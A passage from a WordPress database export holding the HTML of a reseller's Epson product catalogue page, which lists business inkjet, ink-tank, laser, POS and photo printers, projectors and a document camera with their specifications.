PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:26:37','2019-09-25 09:26:37','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3469,1,'2019-09-25 17:27:11','2019-09-25 09:27:11','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 